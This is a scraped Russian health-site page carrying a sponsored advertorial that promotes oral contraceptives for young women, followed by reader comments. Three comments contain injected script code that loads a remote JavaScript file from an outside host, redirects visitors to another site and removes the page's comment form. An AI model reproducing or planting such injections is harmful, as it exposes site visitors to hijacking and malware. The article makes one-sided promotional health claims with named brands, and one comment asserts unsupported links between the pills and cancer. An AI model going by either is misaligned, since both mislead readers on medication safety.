Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Одна таблетка от всего. П...  >>  Одна таблетка от всего. Противозачаточные для молодых
 
Обратная связь
 

Одна таблетка от всего. Противозачаточные для молодых

Размер шрифта
19 августа 2013 00:00
  • google_analytics: false
  • Нравится

Недавние исследования показали, что двадцатилетние люди – самые счастливые! Не поспоришь: молодые, радостные, пышущие здоровьем! О каких таблетках может быть речь?! Только об одной, причем от всего… О противозачаточном средстве. И как говорил Игорь Николаев: «У меня на это 5 причин».

Одна таблетка от всего. Противозачаточные для молодых

1 причина: чистая кожа без прыщей

Оральные контрацептивы с дроспиреноном обладают косметическим эффектом. Они уменьшают концентрацию тестостерона, мужского полового гормона. Именно тестостерон виноват в том, что сальные железы в коже производят много сала, на котором размножаются бактерии, и появляются прыщи. Чем меньше тестостерона, тем меньше кожа производит сала – бактериям негде размножаться. Вот теперь ваша кожа прекрасна!

2 причина: НЕТ ПМС

Главная причина ПМС – гормональные колебания во второй половине вашего менструального цикла. Главные симптомы ПМС: болезненные груди, вздутие, когда вы чувствуете себя как бочка. Оральные контрацептивы успокоят эти колебания гормонов и уменьшат симптомы ПМС. Чтобы избавиться от всех симптомов вам нужно противозачаточное средство с низким содержанием этинилэстрадиола (аналог эстрогена, женского полового гормона) и дроспиренона. Такой контрацептив выведет излишек жидкости из организма женщины. Именно лишняя, задержанная жидкость, приводит к боли в груди и отекам. Такими противозачаточными являются Димиа и Белара.

3 причина: от противозачаточных не толстеют. Есть шанс даже похудеть

Когда противозачаточные препараты только появились в начале 60-х годов, они содержали огромную дозу эстрогенов и прогестинов, почти в 1000 раз больше, чем нужно обычной женщине. Отсюда и пошел этот миф. Эстроген в больших дозах действительно может увеличивать аппетит и задерживать жидкость в организме. Так что 50 лет назад контрацептивы действительно могли вызывать прибавку в весе. Но современные препараты содержат минимальные дозы этинилэстрадиола (аналоги эстрогена) и дроспиренона. Минимальные дозы эстрогена не могут вызывать увеличения аппетита. А дроспиренон, на самом деле, даже уменьшает задержку жидкости, так что женщина может даже немного похудеть. Более того, 44 масштабных исследования не нашли никакой связи между оральными контрацептивами и набором веса!

Так что сегодня лишний вес никак нельзя списать на контрацептивы.

4 причина: месячные меньше и безболезненные

Когда вы принимаете оральные контрацептивы, вы не овулируете (то есть яйцеклетка не выходит) и стенка матки не увеличивается так сильно, готовясь к беременности. Так что, по сути у вас нет «настоящих» месячных. Это просто остаточные кровотечения из-за уменьшения гормонов. Именно поэтому у большинства девушек, принимающих контрацептивы, месячные меньше и короче, а боль либо минимальная, либо ее совсем нет.

5 причина: совсем маленький риск рака

Использование оральных контрацептивов может снизить риск рака матки и рака яичников на 70% после 12 лет. Даже после приема в течение 1-5 лет риск снижается на 40%! Овуляция (процесс выходя яйцеклетки из яичника в матку) вызывает изменения в клетках яичника, которые могут привести к раку. Противозачаточные уменьшают количество овуляций – яичники остаются целыми, а вы без рака.

Если вы хотите узнать еще больше о методах контрацепции и о том, какие из них подходят именно вам – нажмите сюда.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

24 августа 2013 в 08:55

Цитировать   |   Пожаловаться

Насколько я знаю, не все контрацептивы одинаково полезны. Например "Диане-35" вообще запретили во Франции. Все только и твердят о том, что если риск рака яичников, матки снижен, то риск рака молочной железы наоборот увеличен. Так ли это на самом деле?

2 - Гость

27 марта 2015 в 08:13

Цитировать   |   Пожаловаться

Полный бред! На личном опыте убедилась уже. И вес набрала, хотя всегда весила 45-46кг.  И чувствовала себя так как будто мне жить не долго осталось. Начали болеть почки и постоянно теряла сознание. Через 2 месяца бросила пить (сначала новинет пила, а потом Ярину) несмотря на то что врач заставляла пить их пол года. А рак шейки матки как раз от них и образуется. Врачи их как витамины выписывают а потом все либо лечатся от бесплодия либо всю жизнь их пьют потому что без них уже не могут, как наркотик, фармацевтические фирмы делают огромные деньги на том что колечат женщин! 

3 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Тампон против менструальной чаши. Что лучше?   Менструальные болезни. ПМС   Как сохранить красоту и здоровье после 30?   Менструальные болезни. Эндометриоз  
10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом 09 июля 2012Ученые выяснили, какой вид контрацепции надежнее!
 
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 29 декабря 2012Аспирин снижает риск развития рака яичников
 

Слайдшоу

1
Месячные: что ненормально?
12 фактов о менструальном цикле, которые необходимо знать
Как избавиться от ужасных месячных?

Тесты

Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Мифы о прыщах
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.